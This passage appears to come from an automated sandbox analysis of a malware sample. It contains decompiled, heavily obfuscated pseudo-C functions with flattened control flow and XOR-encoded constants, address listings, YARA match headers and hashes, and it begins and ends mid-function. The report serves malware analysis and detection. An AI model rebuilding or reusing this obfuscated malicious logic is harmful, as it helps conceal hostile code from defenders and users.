									_t491 = E0121358B(_v1768, _v1632,  &_v1584, _v1708, _t529);
									_t596 =  &(_t596[5]);
									__eflags = _t491;
									if(__eflags == 0) {
										goto L26;
									}
									_t591 = 0xb6fc5c6;
									while(1) {
										L1:
										_t487 = 0x689aa28;
										L2:
										_t529 = 0xc3fdd40;
										goto L3;
									}
								}
								if(_t591 == 0xb6fc5c6) {
									E0122855C( &_v1044, _v1680, __eflags, _v1756, _v1644, _t529, _v1772);
									_t496 = E01212B69(_v1788, _v1604,  &_v1044, _v1712);
									_t416 =  &_v1784; // 0x2428
									 *_t496 = 0;
									E01213432( &_v524,  *_t416, __eflags, _v1688);
									_push(_v1704);
									_push(_v1636);
									_t498 = E0122CD35(0x12113e4, _v1588, __eflags);
									_pop(_t543);
									E01222EA5( &_v524, __eflags,  &_v1044, _t543, _v1620, _v1592, _t498, _v1736, _v1628,  &_v1564);
									E0122629F(_v1660, _t498, _v1776, _v1600, _v1724);
									_t504 = E0122E5A7(_t516, _v1648, _v1656,  &_v1564, _v1716);
									_t596 =  &(_t596[0x15]);
									__eflags = _t504;
									if(__eflags == 0) {
										L13:
										_t591 = 0x27e97d;
										goto L1;
									}
									_t487 = 0x689aa28;
									__eflags = _t589 - 0x689aa28;
									_t529 = 0xc3fdd40;
									_t591 =  ==  ? 0xc3fdd40 : 0x88c97f;
									continue;
								}
								if(_t591 == _t529) {
									_push(_v1764);
									_t397 =  &_v1780; // 0xe64e7237
									_t507 = E01213A6C(_v1612,  &_v1564, _v1696,  *_t397, _v1584,  &_v1580, _t529, _v1728);
									_t596 =  &(_t596[8]);
									__eflags = _t507;
									if(__eflags != 0) {
										E01224A33(_v1720, _v1748, _v1580);
										E01224A33(_v1664, _v1652, _v1576);
									}
									goto L13;
								}
								if(_t591 != 0xf344949) {
									goto L22;
								}
								E01212ADB();
								E0122DDA5();
								_t487 = 0x689aa28;
								_t591 = 0xb379dcd;
								_t589 =  !=  ? 0x689aa28 : 0x8bd357c;
								goto L2;
							}
							E01224A33(_v1624, _v1700, _v1584);
							_t591 = 0x4f06587;
							_t487 = 0x689aa28;
							_t529 = 0xc3fdd40;
							L22:
							__eflags = _t591 - 0x4f06587;
						} while (__eflags != 0);
						return _t487;
					}
				}
			}



















































































                          0x0122c205
                          0x0122c20b
                          0x0122c215
                          0x0122c220
                          0x0122c22b
                          0x0122c236
                          0x0122c23e
                          0x0122c246
                          0x0122c24b
                          0x0122c253
                          0x0122c25b
                          0x0122c260
                          0x0122c268
                          0x0122c270
                          0x0122c288
                          0x0122c28a
                          0x0122c28f
                          0x0122c294
                          0x0122c29d
                          0x0122c2a8
                          0x0122c2b0
                          0x0122c2b5
                          0x0122c2bd
                          0x0122c2c5
                          0x0122c2cd
                          0x0122c2d9
                          0x0122c2de
                          0x0122c2e4
                          0x0122c2ec
                          0x0122c2f4
                          0x0122c2ff
                          0x0122c30a
                          0x0122c315
                          0x0122c320
                          0x0122c333
                          0x0122c334
                          0x0122c338
                          0x0122c340
                          0x0122c348
                          0x0122c34d
                          0x0122c355
                          0x0122c35a
                          0x0122c362
                          0x0122c36d
                          0x0122c375
                          0x0122c380
                          0x0122c388
                          0x0122c390
                          0x0122c398
                          0x0122c3a0
                          0x0122c3a8
                          0x0122c3b0
                          0x0122c3bb
                          0x0122c3bf
                          0x0122c3c7
                          0x0122c3cf
                          0x0122c3e2
                          0x0122c3e9
                          0x0122c3f4
                          0x0122c3fc
                          0x0122c406
                          0x0122c40a
                          0x0122c412
                          0x0122c41a
                          0x0122c421
                          0x0122c429
                          0x0122c42e
                          0x0122c436
                          0x0122c43e
                          0x0122c442
                          0x0122c447
                          0x0122c44f
                          0x0122c45a
                          0x0122c465
                          0x0122c470
                          0x0122c484
                          0x0122c489
                          0x0122c492
                          0x0122c49d
                          0x0122c4a5
                          0x0122c4ad
                          0x0122c4b2
                          0x0122c4ba
                          0x0122c4c2
                          0x0122c4ca
                          0x0122c4d2
                          0x0122c4da
                          0x0122c4e5
                          0x0122c4ed
                          0x0122c4f8
                          0x0122c503
                          0x0122c50e
                          0x0122c519
                          0x0122c521
                          0x0122c529
                          0x0122c52e
                          0x0122c536
                          0x0122c541
                          0x0122c549
                          0x0122c554
                          0x0122c55f
                          0x0122c56a
                          0x0122c575
                          0x0122c57d
                          0x0122c582
                          0x0122c58b
                          0x0122c590
                          0x0122c596
                          0x0122c59e
                          0x0122c5a9
                          0x0122c5b1
                          0x0122c5bc
                          0x0122c5c4
                          0x0122c5cc
                          0x0122c5d1
                          0x0122c5d9
                          0x0122c5e4
                          0x0122c5ef
                          0x0122c5fa
                          0x0122c605
                          0x0122c610
                          0x0122c61b
                          0x0122c623
                          0x0122c62b
                          0x0122c630
                          0x0122c638
                          0x0122c643
                          0x0122c64b
                          0x0122c656
                          0x0122c662
                          0x0122c665
                          0x0122c671
                          0x0122c676
                          0x0122c67c
                          0x0122c684
                          0x0122c68c
                          0x0122c691
                          0x0122c694
                          0x0122c698
                          0x0122c6a5
                          0x0122c6a9
                          0x0122c6b1
                          0x0122c6b9
                          0x0122c6c6
                          0x0122c6ca
                          0x0122c6d2
                          0x0122c6da
                          0x0122c6e2
                          0x0122c6ef
                          0x0122c6f2
                          0x0122c6f6
                          0x0122c6fe
                          0x0122c706
                          0x0122c716
                          0x0122c71a
                          0x0122c722
                          0x0122c72a
                          0x0122c732
                          0x0122c73a
                          0x0122c742
                          0x0122c74a
                          0x0122c755
                          0x0122c75d
                          0x0122c768
                          0x0122c773
                          0x0122c77b
                          0x0122c786
                          0x0122c791
                          0x0122c799
                          0x0122c7a4
                          0x0122c7af
                          0x0122c7b7
                          0x0122c7c2
                          0x0122c7cd
                          0x0122c7d5
                          0x0122c7dd
                          0x0122c7ea
                          0x0122c7eb
                          0x0122c7ef
                          0x0122c7f7
                          0x0122c7ff
                          0x0122c80d
                          0x0122c811
                          0x0122c819
                          0x0122c821
                          0x0122c829
                          0x0122c831
                          0x0122c839
                          0x0122c844
                          0x0122c84c
                          0x0122c857
                          0x0122c862
                          0x0122c86a
                          0x0122c875
                          0x0122c880
                          0x0122c895
                          0x0122c898
                          0x0122c89c
                          0x0122c8a1
                          0x0122c8a9
                          0x0122c8b1
                          0x0122c8b9
                          0x0122c8c1
                          0x0122c8c9
                          0x0122c8ce
                          0x0122c8d6
                          0x0122c8e1
                          0x0122c8e9
                          0x0122c8f4
                          0x0122c8fc
                          0x0122c901
                          0x0122c906
                          0x0122c90e
                          0x0122c915
                          0x0122c915
                          0x0122c915
                          0x0122c91a
                          0x0122c91a
                          0x0122c91a
                          0x0122c91f
                          0x00000000
                          0x0122c91f
                          0x0122c92d
                          0x0122cbb8
                          0x0122cbea
                          0x0122cbf2
                          0x0122cbf4
                          0x0122cc30
                          0x0122cc30
                          0x0122cc30
                          0x0122cc0b
                          0x00000000
                          0x0122cc25
                          0x0122c939
                          0x0122cb79
                          0x00000000
                          0x0122cb79
                          0x0122c945
                          0x0122cb31
                          0x0122cb33
                          0x0122cb6f
                          0x00000000
                          0x0122cb6f
                          0x0122cb35
                          0x0122cb43
                          0x0122cb55
                          0x0122cb5a
                          0x0122cb5d
                          0x0122cb5f
                          0x00000000
                          0x00000000
                          0x0122cb65
                          0x0122c915
                          0x0122c915
                          0x0122c915
                          0x0122c91a
                          0x0122c91a
                          0x00000000
                          0x0122c91a
                          0x0122c915
                          0x0122c951
                          0x0122ca31
                          0x0122ca4d
                          0x0122ca59
                          0x0122ca5f
                          0x0122ca69
                          0x0122ca76
                          0x0122ca7a
                          0x0122ca88
                          0x0122ca8e
                          0x0122cac7
                          0x0122cae4
                          0x0122cb08
                          0x0122cb0d
                          0x0122cb10
                          0x0122cb12
                          0x0122ca0c
                          0x0122ca0c
                          0x00000000
                          0x0122ca0c
                          0x0122cb18
                          0x0122cb22
                          0x0122cb24
                          0x0122cb29
                          0x00000000
                          0x0122cb29
                          0x0122c959
                          0x0122c99e
                          0x0122c9bd
                          0x0122c9d0
                          0x0122c9d5
                          0x0122c9d8
                          0x0122c9da
                          0x0122c9eb
                          0x0122ca06
                          0x0122ca0b
                          0x00000000
                          0x0122c9da
                          0x0122c961
                          0x00000000
                          0x00000000
                          0x0122c979
                          0x0122c980
                          0x0122c98c
                          0x0122c991
                          0x0122c996
                          0x00000000
                          0x0122c996
                          0x0122cb95
                          0x0122cb9b
                          0x0122cba0
                          0x0122cba5
                          0x0122cbaa
                          0x0122cbaa
                          0x0122cbaa
                          0x00000000
                          0x0122c91f
                          0x0122c91a

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ($7rN$($7rN$7^$7rN$7rN$Io$`7T$q5$r$s-Q$}'
                          • API String ID: 0-2675266107
                          • Opcode ID: bdca8fae465b6d6f217649059bed3ecfd80ae2c6305bf328d66928a1a4b2b15f
                          • Instruction ID: d2d6563ca6fc0a68a38293b416a4f38785ba59192ed2e3703d6538581f0ed0a1
                          • Opcode Fuzzy Hash: bdca8fae465b6d6f217649059bed3ecfd80ae2c6305bf328d66928a1a4b2b15f
                          • Instruction Fuzzy Hash: 263221725183819FE768CF65C44AA9FBBE1FBC4348F108A1DE6D996260D7B18909CF13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012159BF, Relevance: 12.9, Strings: 10, Instructions: 394COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 99%
                          			E012159BF() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				intOrPtr* _t424;
				void* _t425;
				intOrPtr* _t438;
				void* _t440;
				void* _t470;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				intOrPtr _t487;
				intOrPtr* _t489;
				intOrPtr* _t490;
				signed int* _t494;
				void* _t496;

				_t494 =  &_v1748;
				_v1620 = 0xe208d1;
				_v1620 = _v1620 >> 0x10;
				_t440 = 0x6dd668d;
				_v1620 = _v1620 ^ 0x000000cb;
				_v1632 = 0xf714e8;
				_v1632 = _v1632 >> 0xe;
				_v1632 = _v1632 * 0x70;
				_t490 = 0;
				_v1632 = _v1632 ^ 0x000eb07f;
				_v1572 = 0x2de42c;
				_v1572 = _v1572 | 0x0db3fdf3;
				_v1572 = _v1572 ^ 0x0dbffdfd;
				_v1748 = 0xbc7661;
				_v1748 = _v1748 >> 6;
				_v1748 = _v1748 ^ 0xe50abbec;
				_v1748 = _v1748 >> 6;
				_v1748 = _v1748 ^ 0x0394212a;
				_v1604 = 0xaddaf5;
				_v1604 = _v1604 | 0x415c680c;
				_v1604 = _v1604 ^ 0x41fdfafd;
				_v1588 = 0xdfa901;
				_v1588 = _v1588 + 0xffff3ba4;
				_v1588 = _v1588 ^ 0x00dee4b5;
				_v1644 = 0xd2ab4c;
				_v1644 = _v1644 + 0x7555;
				_v1644 = _v1644 | 0xc36f5ef2;
				_v1644 = _v1644 ^ 0xc3ffc95b;
				_v1684 = 0x1437f7;
				_v1684 = _v1684 + 0x6d4b;
				_v1684 = _v1684 + 0x4f22;
				_v1684 = _v1684 ^ 0x001a9d05;
				_v1740 = 0xba04d3;
				_v1740 = _v1740 >> 0xd;
				_t480 = 0x37;
				_v1740 = _v1740 / _t480;
				_v1740 = _v1740 >> 4;
				_v1740 = _v1740 ^ 0x000d936b;
				_v1628 = 0xc18096;
				_v1628 = _v1628 << 4;
				_v1628 = _v1628 ^ 0x0c105ee9;
				_v1716 = 0x1658bb;
				_v1716 = _v1716 ^ 0xaff49a84;
				_v1716 = _v1716 ^ 0x6e4c268d;
				_v1716 = _v1716 ^ 0xc3497a67;
				_v1716 = _v1716 ^ 0x02e2fab6;
				_v1652 = 0x22ed00;
				_t481 = 0x22;
				_v1576 = 0;
				_v1652 = _v1652 * 0x60;
				_v1652 = _v1652 * 0x3a;
				_v1652 = _v1652 ^ 0xf7a66c18;
				_v1676 = 0xbfcbd5;
				_v1676 = _v1676 ^ 0x30bc9787;
				_v1676 = _v1676 | 0x6db8c808;
				_v1676 = _v1676 ^ 0x7db478e8;
				_v1724 = 0x27ac8c;
				_v1724 = _v1724 << 8;
				_v1724 = _v1724 * 0x31;
				_v1724 = _v1724 << 9;
				_v1724 = _v1724 ^ 0x0d9e6424;
				_v1636 = 0xf4f9d3;
				_v1636 = _v1636 / _t481;
				_v1636 = _v1636 >> 8;
				_v1636 = _v1636 ^ 0x000b680c;
				_v1612 = 0x15495f;
				_t482 = 0x4a;
				_v1612 = _v1612 * 0x17;
				_v1612 = _v1612 ^ 0x01ebd1be;
				_v1668 = 0xfd750c;
				_v1668 = _v1668 >> 1;
				_v1668 = _v1668 << 3;
				_v1668 = _v1668 ^ 0x03f0c5f0;
				_v1700 = 0xe618e7;
				_v1700 = _v1700 | 0xd14a9f7e;
				_v1700 = _v1700 ^ 0x50c0015a;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 ^ 0x4092d66a;
				_v1732 = 0x311c59;
				_v1732 = _v1732 | 0x1d4d615b;
				_v1732 = _v1732 + 0xffff12fd;
				_v1732 = _v1732 >> 3;
				_v1732 = _v1732 ^ 0x03a0715e;
				_v1580 = 0x6c3800;
				_v1580 = _v1580 ^ 0x0701ab83;
				_v1580 = _v1580 ^ 0x076e5a87;
				_v1680 = 0x89170c;
				_v1680 = _v1680 | 0x04b16a81;
				_v1680 = _v1680 ^ 0xfa3b9c1d;
				_v1680 = _v1680 ^ 0xfe8db652;
				_v1688 = 0xb87b48;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xae40cf0d;
				_v1688 = _v1688 ^ 0xaf3a1319;
				_v1660 = 0x9f9940;
				_v1660 = _v1660 | 0x53564beb;
				_v1660 = _v1660 + 0x505b;
				_v1660 = _v1660 ^ 0x53e33529;
				_v1600 = 0xb16c74;
				_v1600 = _v1600 * 0x6d;
				_v1600 = _v1600 ^ 0x4b81be43;
				_v1608 = 0x2a287c;
				_v1608 = _v1608 | 0x04ab5535;
				_v1608 = _v1608 ^ 0x04a38853;
				_v1616 = 0x89c80a;
				_v1616 = _v1616 | 0x954cf2f1;
				_v1616 = _v1616 ^ 0x95c7435e;
				_v1720 = 0xed19c5;
				_v1720 = _v1720 + 0x5778;
				_v1720 = _v1720 / _t482;
				_v1720 = _v1720 | 0xf3a69058;
				_v1720 = _v1720 ^ 0xf3ab39a1;
				_v1640 = 0xb2891c;
				_v1640 = _v1640 + 0x5668;
				_t483 = 0x38;
				_v1640 = _v1640 / _t483;
				_v1640 = _v1640 ^ 0x00008dd3;
				_v1624 = 0x99c5ec;
				_v1624 = _v1624 << 0xa;
				_v1624 = _v1624 ^ 0x671b74a8;
				_v1728 = 0x12e9b6;
				_v1728 = _v1728 + 0xffff9a22;
				_v1728 = _v1728 ^ 0xdf168593;
				_v1728 = _v1728 >> 3;
				_v1728 = _v1728 ^ 0x1be0d240;
				_v1648 = 0x44db66;
				_v1648 = _v1648 << 5;
				_v1648 = _v1648 + 0xffffd6a5;
				_v1648 = _v1648 ^ 0x0890d14f;
				_v1736 = 0x3d89fa;
				_v1736 = _v1736 | 0x17dab9fa;
				_v1736 = _v1736 << 0xb;
				_v1736 = _v1736 + 0x5385;
				_v1736 = _v1736 ^ 0xfdde1303;
				_v1656 = 0xd3b8a3;
				_v1656 = _v1656 + 0xffff3f01;
				_v1656 = _v1656 >> 0xd;
				_v1656 = _v1656 ^ 0x000ca91d;
				_v1744 = 0x4b62a6;
				_v1744 = _v1744 | 0x87af92a3;
				_v1744 = _v1744 + 0x6243;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 ^ 0x0430b30b;
				_v1596 = 0x609a66;
				_v1596 = _v1596 + 0x67ed;
				_v1596 = _v1596 ^ 0x006685f4;
				_v1568 = 0xe1fc2d;
				_v1568 = _v1568 + 0xffffa85e;
				_v1568 = _v1568 ^ 0x00e0c85f;
				_v1664 = 0x458e39;
				_v1664 = _v1664 | 0xe1a9ddeb;
				_v1664 = _v1664 + 0xa342;
				_v1664 = _v1664 ^ 0xe1ebbc10;
				_v1692 = 0x21a211;
				_v1692 = _v1692 ^ 0xf70e94e6;
				_v1692 = _v1692 | 0x495e1ff5;
				_v1692 = _v1692 ^ 0xff731ba7;
				_v1592 = 0xe0a826;
				_v1592 = _v1592 | 0x1c2a3267;
				_v1592 = _v1592 ^ 0x1cefcd0b;
				_v1712 = 0x24bd80;
				_v1712 = _v1712 | 0x7fffefff;
				_v1712 = _v1712 ^ 0x7ff9a260;
				_v1708 = 0xb697;
				_v1708 = _v1708 >> 0xa;
				_v1708 = _v1708 + 0xffffb905;
				_t484 = 0x3a;
				_v1708 = _v1708 / _t484;
				_v1708 = _v1708 ^ 0x046598a2;
				_v1564 = 0xca9a3a;
				_v1564 = _v1564 + 0xdbe7;
				_v1564 = _v1564 ^ 0x00cf55d9;
				_v1672 = 0x92ef8e;
				_t485 = 0x3c;
				_v1672 = _v1672 / _t485;
				_v1672 = _v1672 >> 8;
				_v1672 = _v1672 ^ 0x000477f6;
				_v1584 = 0x1b1235;
				_v1584 = _v1584 ^ 0x13c2311f;
				_v1584 = _v1584 ^ 0x13d0aaf6;
				_v1696 = 0xd2fdc3;
				_v1696 = _v1696 + 0xfffff708;
				_t486 = 0x60;
				_t493 = _v1576;
				_t487 = _v1576;
				_t439 = _v1576;
				_v1696 = _v1696 / _t486;
				_v1696 = _v1696 + 0xffff2ac1;
				_v1696 = _v1696 ^ 0x00067714;
				_v1704 = 0x852645;
				_v1704 = _v1704 + 0xffff3725;
				_v1704 = _v1704 | 0x39ebeb31;
				_v1704 = _v1704 >> 7;
				_v1704 = _v1704 ^ 0x007ab2fb;
				while(1) {
					L1:
					_t470 = 0x5c;
					do {
						while(1) {
							L2:
							_t496 = _t440 - 0xab4f50e;
							if(_t496 <= 0) {
								break;
							}
							__eflags = _t440 - 0xac222e1;
							if(_t440 == 0xac222e1) {
								E0121B464(_t439, _v1592, _v1712, _t493);
								_t440 = 0x7220489;
								_t470 = 0x5c;
								goto L26;
							} else {
								__eflags = _t440 - 0xb1fd63d;
								if(_t440 == 0xb1fd63d) {
									_t489 =  *0x1235218 + 0x234;
									while(1) {
										__eflags =  *_t489 - _t470;
										if(__eflags == 0) {
											break;
										}
										_t489 = _t489 + 2;
										__eflags = _t489;
									}
									_t487 = _t489 + 2;
									_t440 = 0xc7cbd0f;
									continue;
								} else {
									__eflags = _t440 - 0xc7cbd0f;
									if(_t440 != 0xc7cbd0f) {
										goto L26;
									} else {
										_t438 = E0121ACDB(_t440, _v1600, _v1608, _v1632, _t440, _v1616);
										_t439 = _t438;
										_t494 =  &(_t494[4]);
										__eflags = _t438;
										if(__eflags != 0) {
											_t440 = 0xab4f50e;
											while(1) {
												L1:
												_t470 = 0x5c;
												goto L2;
											}
										}
									}
								}
							}
							L9:
							return _t490;
						}
						if(_t496 == 0) {
							_t424 = E0122B3BE(_t487, _v1720, _t440, _v1640, _v1624, _v1728, _v1588, _v1648, _v1736, _t440, _v1572, _t440, _v1656, _v1744, _v1748, _t439, _t440, _v1596,  &_v520, _t440, _v1568, _v1664, _v1604, _t487, _v1692);
							_t493 = _t424;
							_t494 =  &(_t494[0x17]);
							__eflags = _t424;
							if(__eflags == 0) {
								goto L11;
							} else {
								_t440 = 0xac222e1;
								_t490 = 1;
								_v1576 = 1;
								goto L1;
							}
						} else {
							if(_t440 == 0x4d2f71a) {
								_push(_v1676);
								_push(_v1652);
								_t425 = E0122CD35(0x1211020, _v1716, __eflags);
								E012323F2( &_v1560, __eflags);
								E0122E35F( *0x1235218 + 0x18, __eflags, _v1724, _v1636, _v1612, 0x104, _v1668,  &_v520,  &_v1560, _t425, _v1700,  *0x1235218 + 0x234, _v1732);
								E0122629F(_v1580, _t425, _v1680, _v1688, _v1660);
								_t490 = _v1576;
								_t494 =  &(_t494[0x10]);
								_t440 = 0xb1fd63d;
								while(1) {
									L1:
									_t470 = 0x5c;
									goto L2;
								}
							} else {
								if(_t440 == 0x6dd668d) {
									E0121B3B4(_v1644, _t440, _v1684, _t440, _v1740,  &_v1040, _v1628, _v1620);
									_t494 =  &(_t494[7]);
									_t440 = 0x4d2f71a;
									while(1) {
										L1:
										_t470 = 0x5c;
										goto L2;
									}
								} else {
									if(_t440 == 0x7220489) {
										E0121EDC5(_v1708, _t493, _v1564, _v1672);
										L11:
										_t440 = 0x739dfbe;
										while(1) {
											L1:
											_t470 = 0x5c;
											goto L2;
										}
									} else {
										if(_t440 != 0x739dfbe) {
											goto L26;
										} else {
											E0121EDC5(_v1584, _t439, _v1696, _v1704);
										}
									}
								}
							}
						}
						goto L9;
						L26:
						__eflags = _t440 - 0x18c7ad4;
					} while (__eflags != 0);
					goto L9;
				}
			}






































































                          0x012159bf
                          0x012159c5
                          0x012159d2
                          0x012159da
                          0x012159df
                          0x012159ea
                          0x012159f2
                          0x01215a00
                          0x01215a07
                          0x01215a09
                          0x01215a14
                          0x01215a1f
                          0x01215a2a
                          0x01215a35
                          0x01215a3d
                          0x01215a42
                          0x01215a4a
                          0x01215a4f
                          0x01215a57
                          0x01215a62
                          0x01215a6d
                          0x01215a78
                          0x01215a83
                          0x01215a8e
                          0x01215a99
                          0x01215aa1
                          0x01215aa9
                          0x01215ab1
                          0x01215ab9
                          0x01215ac1
                          0x01215ac9
                          0x01215ad1
                          0x01215ad9
                          0x01215ae1
                          0x01215aec
                          0x01215af1
                          0x01215af7
                          0x01215afc
                          0x01215b04
                          0x01215b0f
                          0x01215b17
                          0x01215b22
                          0x01215b2a
                          0x01215b32
                          0x01215b3a
                          0x01215b42
                          0x01215b4a
                          0x01215b57
                          0x01215b58
                          0x01215b5f
                          0x01215b68
                          0x01215b6c
                          0x01215b74
                          0x01215b7c
                          0x01215b84
                          0x01215b8c
                          0x01215b94
                          0x01215b9c
                          0x01215ba6
                          0x01215baa
                          0x01215baf
                          0x01215bb7
                          0x01215bcb
                          0x01215bd2
                          0x01215bda
                          0x01215be5
                          0x01215bfc
                          0x01215bff
                          0x01215c06
                          0x01215c11
                          0x01215c19
                          0x01215c1d
                          0x01215c22
                          0x01215c2a
                          0x01215c32
                          0x01215c3a
                          0x01215c42
                          0x01215c46
                          0x01215c4e
                          0x01215c56
                          0x01215c5e
                          0x01215c66
                          0x01215c6b
                          0x01215c73
                          0x01215c7e
                          0x01215c89
                          0x01215c94
                          0x01215c9c
                          0x01215ca4
                          0x01215cac
                          0x01215cb4
                          0x01215cbc
                          0x01215cc0
                          0x01215cc8
                          0x01215cd0
                          0x01215cd8
                          0x01215ce0
                          0x01215ce8
                          0x01215cf0
                          0x01215d03
                          0x01215d0a
                          0x01215d15
                          0x01215d20
                          0x01215d2b
                          0x01215d36
                          0x01215d41
                          0x01215d4c
                          0x01215d57
                          0x01215d5f
                          0x01215d6f
                          0x01215d73
                          0x01215d7b
                          0x01215d83
                          0x01215d8e
                          0x01215da0
                          0x01215da3
                          0x01215da7
                          0x01215daf
                          0x01215dba
                          0x01215dc2
                          0x01215dcd
                          0x01215dd5
                          0x01215ddd
                          0x01215de5
                          0x01215dea
                          0x01215df2
                          0x01215dfa
                          0x01215dff
                          0x01215e07
                          0x01215e0f
                          0x01215e17
                          0x01215e1f
                          0x01215e24
                          0x01215e2c
                          0x01215e34
                          0x01215e3c
                          0x01215e44
                          0x01215e49
                          0x01215e53
                          0x01215e5b
                          0x01215e63
                          0x01215e6b
                          0x01215e70
                          0x01215e78
                          0x01215e83
                          0x01215e8e
                          0x01215e99
                          0x01215ea4
                          0x01215eaf
                          0x01215eba
                          0x01215ec2
                          0x01215eca
                          0x01215ed2
                          0x01215eda
                          0x01215ee2
                          0x01215eea
                          0x01215ef2
                          0x01215efa
                          0x01215f05
                          0x01215f10
                          0x01215f1b
                          0x01215f23
                          0x01215f2b
                          0x01215f33
                          0x01215f3b
                          0x01215f40
                          0x01215f4e
                          0x01215f53
                          0x01215f59
                          0x01215f61
                          0x01215f6c
                          0x01215f77
                          0x01215f82
                          0x01215f8e
                          0x01215f93
                          0x01215f99
                          0x01215f9e
                          0x01215fa6
                          0x01215fb1
                          0x01215fbc
                          0x01215fc7
                          0x01215fcf
                          0x01215fdb
                          0x01215fde
                          0x01215fe5
                          0x01215fec
                          0x01215ff3
                          0x01215ff7
                          0x01215fff
                          0x01216007
                          0x0121600f
                          0x01216017
                          0x0121601f
                          0x01216024
                          0x0121602c
                          0x0121602c
                          0x0121602e
                          0x0121602f
                          0x0121602f
                          0x0121602f
                          0x0121602f
                          0x01216035
                          0x00000000
                          0x00000000
                          0x01216230
                          0x01216236
                          0x012162b2
                          0x012162bb
                          0x012162c0
                          0x00000000
                          0x01216238
                          0x01216238
                          0x0121623e
                          0x01216287
                          0x01216292
                          0x01216292
                          0x01216295
                          0x00000000
                          0x00000000
                          0x0121628f
                          0x0121628f
                          0x0121628f
                          0x01216297
                          0x0121629a
                          0x00000000
                          0x01216240
                          0x01216240
                          0x01216246
                          0x00000000
                          0x01216248
                          0x01216265
                          0x0121626a
                          0x0121626c
                          0x0121626f
                          0x01216271
                          0x01216277
                          0x0121602c
                          0x0121602c
                          0x0121602e
                          0x00000000
                          0x0121602e
                          0x0121602c
                          0x01216271
                          0x01216246
                          0x0121623e
                          0x01216082
                          0x0121608d
                          0x0121608d
                          0x0121603b
                          0x0121620a
                          0x0121620f
                          0x01216211
                          0x01216214
                          0x01216216
                          0x00000000
                          0x0121621c
                          0x0121621e
                          0x01216223
                          0x01216224
                          0x00000000
                          0x01216224
                          0x01216041
                          0x01216047
                          0x012160e9
                          0x012160f2
                          0x012160fa
                          0x01216108
                          0x0121615f
                          0x01216182
                          0x01216187
                          0x0121618e
                          0x01216191
                          0x0121602c
                          0x0121602c
                          0x0121602e
                          0x00000000
                          0x0121602e
                          0x0121604d
                          0x01216053
                          0x012160d7
                          0x012160dc
                          0x012160df
                          0x0121602c
                          0x0121602c
                          0x0121602e
                          0x00000000
                          0x0121602e
                          0x01216055
                          0x0121605b
                          0x0121609f
                          0x012160a6
                          0x012160a6
                          0x0121602c
                          0x0121602c
                          0x0121602e
                          0x00000000
                          0x0121602e
                          0x0121605d
                          0x01216063
                          0x00000000
                          0x01216069
                          0x0121607a
                          0x01216080
                          0x01216063
                          0x0121605b
                          0x01216053
                          0x01216047
                          0x00000000
                          0x012162c1
                          0x012162c1
                          0x012162c1
                          0x00000000
                          0x012162cd

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "O$)5S$,-$19$Cb$Uu$hV$xW$|(*$g
                          • API String ID: 0-1036375657
                          • Opcode ID: 5aaad45e50cadc31cd9d472aa94cd78f5c26cf424d280bef79ff95cc4f2ac9dd
                          • Instruction ID: 31d11f4c649f42d6258ae270439dc8e14f5ef06b204687f95d2ce7c4296bf81b
                          • Opcode Fuzzy Hash: 5aaad45e50cadc31cd9d472aa94cd78f5c26cf424d280bef79ff95cc4f2ac9dd
                          • Instruction Fuzzy Hash: 8222107150D3819FD3A8CF65C54AA9FBBE2FBD0708F10891DE29A86264C7B18949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01216869, Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E01216869(signed int __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _t425;
				signed int _t445;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t496;
				void* _t497;
				signed int* _t501;

				_t501 =  &_v2784;
				_v2736 = 0xd70c46;
				_v2736 = _v2736 << 6;
				_v2736 = _v2736 >> 5;
				_v2736 = _v2736 ^ 0x01ae18a5;
